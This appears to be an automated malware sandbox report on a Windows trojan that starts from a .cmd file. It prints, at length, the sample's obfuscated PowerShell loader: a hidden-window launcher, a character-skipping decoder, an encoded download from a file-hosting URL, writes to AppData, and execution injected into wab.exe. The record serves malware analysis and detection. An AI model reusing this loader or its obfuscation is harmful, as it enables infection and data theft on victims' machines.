              Source: wab.exe, 0000000F.00000002.3113782270.00000000063FD000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: alkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29
              Source: powershell.exe, 00000003.00000002.1894282866.000002AD59D34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,t
              Source: powershell.exe, 00000003.00000002.1788126978.000002AD419ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1669254293.00000000044FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido
              Source: powershell.exeBinary or memory string: T,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist
              Source: powershell.exe, 00000003.00000002.1894282866.000002AD59D26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,ou+P
              Source: classification engineClassification label: mal100.troj.evad.winCMD@14/14@4/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Tider.DreJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8172
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:564:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvwr4l2v.4ib.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4904
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7776
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIn
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe 